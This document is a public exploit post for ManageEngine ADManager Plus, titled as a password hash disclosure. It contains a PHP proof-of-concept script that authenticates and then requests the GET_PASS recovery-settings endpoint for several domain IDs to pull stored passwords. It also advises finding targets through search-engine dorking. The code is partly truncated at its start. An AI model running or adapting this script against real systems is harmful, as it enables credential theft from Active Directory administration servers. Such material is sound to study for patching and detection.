============================================================================================================================================= | # Title : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) | | # Vendor : https://www.manageengine.com/products/ad-manager/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a Password Hash disclosure vulnerability.. [+] save code as poc.php . [+] USage : php poc.php -t -a -u -p [+] PayLoad : "false", "j_username" => $user, "j_password" => $password, "domainName" => $auth, "AUTHRULE_NAME" => "ADAuthenticator" ]); // إعدادات الطلب $url = $target . 'j_security_check?LogoutFromSSO=true'; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HTTPHEADER, [ "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "Content-Type: application/x-www-form-urlencoded" ]); // إرسال الطلب $response = curl_exec($ch); // التحقق من المصادقة $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if (strpos($response, 'Cookie') !== false) { echo "[+] Authentication successful!\n"; } elseif ($http_code == 200) { echo "[-] Invalid login name/password!\n"; exit(0); } else { echo "[-] Something went wrong!\n"; exit(1); } // استرجاع كلمة المرور for ($i = 1; $i <= 5; $i++) { echo "[*] Trying to fetch recovery password for domainId: $i!\n"; $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D'; curl_setopt($ch, CURLOPT_URL, $passUrl); curl_setopt($ch, CURLOPT_POST, false); $passResponse = curl_exec($ch); if ($passResponse) { echo $passResponse . "\n"; } } curl_close($ch); } function get_args() { global $argv; $args = [ 'target' => '', 'auth' => '', 'user' => '', 'password' => '' ]; for ($i = 1; $i < count($argv); $i++) { switch ($argv[$i]) { case '-t': case '--target': $args['target'] = $argv[++$i]; break; case '-a': case '--auth': $args['auth'] = $argv[++$i]; break; case '-u': case '--user': $args['user'] = $argv[++$i]; break; case '-p': case '--password': $args['password'] = $argv[++$i]; break; } } return $args; } function main() { $args = get_args(); if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) { echo "Usage: php exploit.php -t -a -u -p \n"; exit(1); } getPass($args['target'], $args['auth'], $args['user'], $args['password']); } main(); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================